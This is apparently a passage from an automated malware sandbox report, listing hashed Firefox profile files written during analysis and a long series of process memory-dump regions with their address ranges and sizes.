                                                                                                64ca396945004a21b9ee77b4793cfcc62cdab7c43d25a7baadf099b71bd331d4

                                                                                                SHA512

                                                                                                e2d1ce46ad38f69009b2db0567467e941bfc6b773517cd97cfc2e9f2284abc5dcf938be937970b9237b1b133aafedcc0fa3a4f6e262b9610d466101e362628c7

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs-1.js

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                42ec1ab4523139801fa948364cf67f93

                                                                                                SHA1

                                                                                                4c1fee3552de620ea1dc3c8452d2074aa4a87b8d

                                                                                                SHA256

                                                                                                d2a440ce09d9135fef52fc435c2baaf81df0cf2896a44889742f799a8e6aa1d3

                                                                                                SHA512

                                                                                                3149ce04be15874877b73ca4e7bd71e0228077076c2ece77ce696c813e3cd9ebdd88c0b1a6696abf31e804a375e75c7ebada363cc42e51ce811cab4d8303e643

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs-1.js

                                                                                                Filesize

                                                                                                7KB

                                                                                                MD5

                                                                                                3c7dc67c51c09a305486af138d17ae65

                                                                                                SHA1

                                                                                                09c6aaaf7d976dd26794ea2a9e6d3fdbc906f2cf

                                                                                                SHA256

                                                                                                4fab07c6b97c1b025b7a52331e40e36f8757f49032b21780cc14c6ab82335e1d

                                                                                                SHA512

                                                                                                712251d0eef1c476df94bf7bc3716049bea1f054f5a9547e15a7928e0c52f664431fd61d084e9ac783f63ab0914514f6d49c2d5181ad97fee523ae258caad07c

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs-1.js

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                31c1072157187b3f4c2d206e001668e5

                                                                                                SHA1

                                                                                                38ba054e8d9c7331c678419a7f6de7c46b226bfe

                                                                                                SHA256

                                                                                                a5a83fe334aa6024c80313787607d2651e2a5e22b0da2e047aa399cd643560dc

                                                                                                SHA512

                                                                                                8f401cc6fad11118c1a302fc799c8e92930b59ae57550b20c944ab2f54a0b976581d57b4a568134d3bc7ce134a034e994c275b486ba6b9338120ce2574875abc

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs.js

                                                                                                Filesize

                                                                                                6KB

                                                                                                MD5

                                                                                                2c543daee54b86d52732ebe322925049

                                                                                                SHA1

                                                                                                23e64ef50a465c0f7145f907427d409cf0be3f29

                                                                                                SHA256

                                                                                                32b1cd48fefc2908b14b0020255cd4f0fe41bfb1726cf9e2347f6589516866a6

                                                                                                SHA512

                                                                                                c41e0d29f886b486b3460782815b7bae83eee74613484aea2f4cb5db980c7461cc1298eb532652d4f4779753567ae5ca06b730c2d106434f90a7a9286dac9283

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\sessionstore-backups\recovery.jsonlz4

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                2721b7a8bbd76b5eaafe1d14b64a99d5

                                                                                                SHA1

                                                                                                e34ea877b8ae85580fd0da736e86c74f0f1a2d86

                                                                                                SHA256

                                                                                                d5cadaf4cba461684635bb9e7caec502e99d690df37cfa5bb70ebcb8fbdea7f6

                                                                                                SHA512

                                                                                                12a4830e3502fccf90225cb7e8d2443abcaeb0641c2a1cde18a7354cadcc4a5c4eda42ab22f23a94856f19d69e6ab97a9715b032891749778bd477369ec016a7

                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                Filesize

                                                                                                2.2MB

                                                                                                MD5

                                                                                                310ccf09ca27b920826459f4d910da86

                                                                                                SHA1

                                                                                                f46a77504b6d899e55305536ac497be503b6d2d9

                                                                                                SHA256

                                                                                                a61b38db584877c7115825e12fc8a1013a5d9fc039fce962b0f1031bca37b85d

                                                                                                SHA512

                                                                                                8c34c45f45541793e5c51ab1aa7398ea6fc15fc4e8e2b326953544db69b10435425118195eaa09607218d32bfaea8f50922a27f48298e384fdb7ff9d763ba177

                                                                                              • memory/756-34-0x0000000000F10000-0x00000000013CA000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/756-48-0x0000000000F10000-0x00000000013CA000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/1380-376-0x0000000000B10000-0x00000000011A6000-memory.dmp

                                                                                                Filesize

                                                                                                6.6MB

                                                                                              • memory/1380-1458-0x0000000000B10000-0x00000000011A6000-memory.dmp

                                                                                                Filesize

                                                                                                6.6MB

                                                                                              • memory/1380-273-0x0000000000B10000-0x00000000011A6000-memory.dmp

                                                                                                Filesize

                                                                                                6.6MB

                                                                                              • memory/1380-275-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                Filesize

                                                                                                972KB

                                                                                              • memory/1380-694-0x0000000000B10000-0x00000000011A6000-memory.dmp

                                                                                                Filesize

                                                                                                6.6MB

                                                                                              • memory/1380-1278-0x0000000000B10000-0x00000000011A6000-memory.dmp

                                                                                                Filesize

                                                                                                6.6MB

                                                                                              • memory/1560-7606-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1560-997-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1560-4861-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1560-1429-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1560-1428-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1560-1763-0x0000000000400000-0x000000000085E000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/1700-1491-0x0000000006020000-0x000000000602A000-memory.dmp

                                                                                                Filesize

                                                                                                40KB

                                                                                              • memory/1700-1493-0x00000000088B0000-0x000000000891A000-memory.dmp

                                                                                                Filesize

                                                                                                424KB

                                                                                              • memory/1700-1485-0x0000000070250000-0x0000000070830000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1700-3975-0x00000000097F0000-0x0000000009842000-memory.dmp

                                                                                                Filesize

                                                                                                328KB

                                                                                              • memory/1700-2264-0x0000000070250000-0x0000000070830000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1700-1476-0x0000000000390000-0x000000000097C000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1700-1492-0x0000000008950000-0x00000000089EC000-memory.dmp

                                                                                                Filesize

                                                                                                624KB

                                                                                              • memory/1700-1477-0x00000000052C0000-0x0000000005352000-memory.dmp

                                                                                                Filesize

                                                                                                584KB

                                                                                              • memory/1700-1490-0x00000000730F0000-0x0000000073179000-memory.dmp

                                                                                                Filesize

                                                                                                548KB

                                                                                              • memory/1700-1494-0x00000000060B0000-0x00000000060C0000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1700-4845-0x0000000070250000-0x0000000070830000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1700-1487-0x0000000070250000-0x0000000070830000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1700-1489-0x0000000070250000-0x0000000070830000-memory.dmp

                                                                                                Filesize

                                                                                                5.9MB

                                                                                              • memory/1788-177-0x0000000006360000-0x00000000063AC000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/2860-165-0x0000000000240000-0x00000000006FA000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/2860-152-0x0000000000240000-0x00000000006FA000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/2896-70-0x000002303C020000-0x000002303C042000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/3108-127-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                Filesize

                                                                                                396KB

                                                                                              • memory/3108-124-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                Filesize

                                                                                                396KB

                                                                                              • memory/4104-111-0x0000026445DB0000-0x0000026445DC8000-memory.dmp

                                                                                                Filesize

                                                                                                96KB

                                                                                              • memory/4116-123-0x00000000065D0000-0x000000000661C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/4116-113-0x00000000059A0000-0x0000000005CF4000-memory.dmp

                                                                                                Filesize

                                                                                                3.3MB

                                                                                              • memory/4156-239-0x0000000000750000-0x0000000000C0A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/4156-242-0x0000000000750000-0x0000000000C0A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/4312-3796-0x00000000004B0000-0x0000000000F3E000-memory.dmp

                                                                                                Filesize

                                                                                                10.6MB

                                                                                              • memory/4312-2926-0x00000000004B0000-0x0000000000F3E000-memory.dmp

                                                                                                Filesize

                                                                                                10.6MB

                                                                                              • memory/4564-1344-0x0000017476F30000-0x0000017476F42000-memory.dmp

                                                                                                Filesize

                                                                                                72KB

                                                                                              • memory/4576-1183-0x0000000000F70000-0x00000000013D8000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/4576-1329-0x0000000000F70000-0x00000000013D8000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/4576-377-0x0000000000F70000-0x00000000013D8000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/4576-395-0x0000000000F70000-0x00000000013D8000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/4576-611-0x0000000000F70000-0x00000000013D8000-memory.dmp

                                                                                                Filesize

                                                                                                4.4MB

                                                                                              • memory/4724-20-0x0000000006AB0000-0x0000000006ACA000-memory.dmp

                                                                                                Filesize

                                                                                                104KB

                                                                                              • memory/4724-18-0x00000000065D0000-0x000000000661C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/4724-3-0x0000000005830000-0x0000000005E58000-memory.dmp

                                                                                                Filesize

                                                                                                6.2MB

                                                                                              • memory/4724-23-0x0000000007A70000-0x0000000007A92000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/4724-2-0x0000000002C70000-0x0000000002CA6000-memory.dmp

                                                                                                Filesize

                                                                                                216KB

                                                                                              • memory/4724-5-0x0000000005670000-0x00000000056D6000-memory.dmp

                                                                                                Filesize

                                                                                                408KB

                                                                                              • memory/4724-16-0x00000000060A0000-0x00000000063F4000-memory.dmp

                                                                                                Filesize

                                                                                                3.3MB

                                                                                              • memory/4724-4-0x00000000055D0000-0x00000000055F2000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/4724-19-0x0000000007CC0000-0x000000000833A000-memory.dmp

                                                                                                Filesize

                                                                                                6.5MB

                                                                                              • memory/4724-24-0x00000000088F0000-0x0000000008E94000-memory.dmp

                                                                                                Filesize

                                                                                                5.6MB

                                                                                              • memory/4724-6-0x0000000005790000-0x00000000057F6000-memory.dmp

                                                                                                Filesize

                                                                                                408KB

                                                                                              • memory/4724-22-0x0000000007AE0000-0x0000000007B76000-memory.dmp

                                                                                                Filesize

                                                                                                600KB

                                                                                              • memory/4724-17-0x00000000065B0000-0x00000000065CE000-memory.dmp

                                                                                                Filesize

                                                                                                120KB

                                                                                              • memory/5068-258-0x0000000000240000-0x00000000006E2000-memory.dmp

                                                                                                Filesize

                                                                                                4.6MB

                                                                                              • memory/5068-256-0x0000000000240000-0x00000000006E2000-memory.dmp

                                                                                                Filesize

                                                                                                4.6MB

                                                                                              • memory/5296-382-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5296-622-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-229-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-90-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-8142-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-46-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-6293-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-375-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-2099-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-1483-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-1182-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-259-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5344-91-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/5352-227-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                Filesize

                                                                                                396KB

                                                                                              • memory/5352-228-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                Filesize

                                                                                                396KB

                                                                                              • memory/5636-4779-0x0000000000400000-0x000000000040E000-memory.dmp

                                                                                                Filesize

                                                                                                56KB

                                                                                              • memory/5724-24431-0x0000019879C00000-0x0000019879D0A000-memory.dmp

                                                                                                Filesize

                                                                                                1.0MB

                                                                                              • memory/5724-27226-0x0000019879DC0000-0x0000019879E0C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/5724-27225-0x0000019879D10000-0x0000019879D66000-memory.dmp

                                                                                                Filesize

                                                                                                344KB

                                                                                              • memory/5724-27227-0x0000019879F10000-0x0000019879F64000-memory.dmp

                                                                                                Filesize

                                                                                                336KB

                                                                                              • memory/5724-24430-0x000001985F740000-0x000001985F7E8000-memory.dmp

                                                                                                Filesize

                                                                                                672KB

                                                                                              • memory/6072-230-0x00000000067D0000-0x000000000681C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/6444-7858-0x0000000000E90000-0x000000000133C000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/6444-7811-0x0000000008620000-0x0000000008632000-memory.dmp

                                                                                                Filesize

                                                                                                72KB

                                                                                              • memory/6444-7736-0x0000000000E90000-0x000000000133C000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/6444-7734-0x0000000000E90000-0x000000000133C000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/6444-7838-0x0000000008B80000-0x0000000008BBC000-memory.dmp

                                                                                                Filesize

                                                                                                240KB

                                                                                              • memory/6444-7715-0x0000000000E90000-0x000000000133C000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/7324-8157-0x0000000000920000-0x0000000000DCC000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/7324-7852-0x0000000000920000-0x0000000000DCC000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/7324-7870-0x0000000000920000-0x0000000000DCC000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/7324-7869-0x0000000000920000-0x0000000000DCC000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/7364-8178-0x0000000000170000-0x0000000000172000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                              • memory/7364-8187-0x000001EE6ACA0000-0x000001EE6AD11000-memory.dmp

                                                                                                Filesize

                                                                                                452KB

                                                                                              • memory/7364-8188-0x000001EE6ACA0000-0x000001EE6AD11000-memory.dmp

                                                                                                Filesize

                                                                                                452KB

                                                                                              • memory/7364-8179-0x000001EE6ACA0000-0x000001EE6AD11000-memory.dmp

                                                                                                Filesize

                                                                                                452KB

                                                                                              • memory/7364-8186-0x000001EE6ACA0000-0x000001EE6AD11000-memory.dmp

                                                                                                Filesize

                                                                                                452KB

                                                                                              • memory/7428-7871-0x000000000A7E0000-0x000000000AC76000-memory.dmp

                                                                                                Filesize

                                                                                                4.6MB

                                                                                              • memory/7428-6940-0x0000000006270000-0x00000000065C4000-memory.dmp

                                                                                                Filesize

                                                                                                3.3MB

                                                                                              • memory/7428-7296-0x0000000006C10000-0x0000000006C5C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/7428-7872-0x0000000007E20000-0x0000000007E76000-memory.dmp

                                                                                                Filesize

                                                                                                344KB

                                                                                              • memory/7696-8175-0x0000000000400000-0x000000000068D000-memory.dmp

                                                                                                Filesize

                                                                                                2.6MB

                                                                                              • memory/8068-8206-0x0000000004B70000-0x0000000004BEF000-memory.dmp

                                                                                                Filesize

                                                                                                508KB

                                                                                              • memory/8068-8208-0x0000000004B70000-0x0000000004BEF000-memory.dmp

                                                                                                Filesize

                                                                                                508KB

                                                                                              • memory/8068-8207-0x0000000004B70000-0x0000000004BEF000-memory.dmp

                                                                                                Filesize

                                                                                                508KB

                                                                                              • memory/8092-6267-0x00000000079B0000-0x00000000079C4000-memory.dmp

                                                                                                Filesize

                                                                                                80KB

                                                                                              • memory/8092-5742-0x0000000006A20000-0x0000000006A3E000-memory.dmp

                                                                                                Filesize

                                                                                                120KB

                                                                                              • memory/8092-6294-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

                                                                                                Filesize

                                                                                                104KB

                                                                                              • memory/8092-8202-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/8092-8205-0x0000000000990000-0x0000000000E4A000-memory.dmp

                                                                                                Filesize

                                                                                                4.7MB

                                                                                              • memory/8092-5825-0x00000000077E0000-0x00000000077EA000-memory.dmp

                                                                                                Filesize

                                                                                                40KB

                                                                                              • memory/8092-5991-0x0000000007970000-0x0000000007981000-memory.dmp

                                                                                                Filesize

                                                                                                68KB

                                                                                              • memory/8092-6242-0x00000000079A0000-0x00000000079AE000-memory.dmp

                                                                                                Filesize

                                                                                                56KB

                                                                                              • memory/8092-4701-0x0000000005D20000-0x0000000006074000-memory.dmp

                                                                                                Filesize

                                                                                                3.3MB

                                                                                              • memory/8092-5009-0x00000000069C0000-0x0000000006A0C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/8092-5703-0x00000000706D0000-0x000000007071C000-memory.dmp

                                                                                                Filesize

                                                                                                304KB

                                                                                              • memory/8092-5763-0x0000000007680000-0x0000000007723000-memory.dmp

                                                                                                Filesize

                                                                                                652KB

                                                                                              • memory/8092-5694-0x0000000007440000-0x0000000007472000-memory.dmp

                                                                                                Filesize

                                                                                                200KB

                                                                                              • memory/8092-6359-0x0000000007A90000-0x0000000007A98000-memory.dmp

                                                                                                Filesize

                                                                                                32KB

                                                                                              • memory/13232-24393-0x000001B05B9E0000-0x000001B05B9EA000-memory.dmp

                                                                                                Filesize

                                                                                                40KB

                                                                                              • memory/13232-24392-0x000001B043560000-0x000001B043568000-memory.dmp

                                                                                                Filesize

                                                                                                32KB

                                                                                              • memory/13232-24391-0x000001B043550000-0x000001B04355A000-memory.dmp

                                                                                                Filesize

                                                                                                40KB

                                                                                              • memory/13232-24390-0x000001B05B9C0000-0x000001B05B9DC000-memory.dmp

                                                                                                Filesize

                                                                                                112KB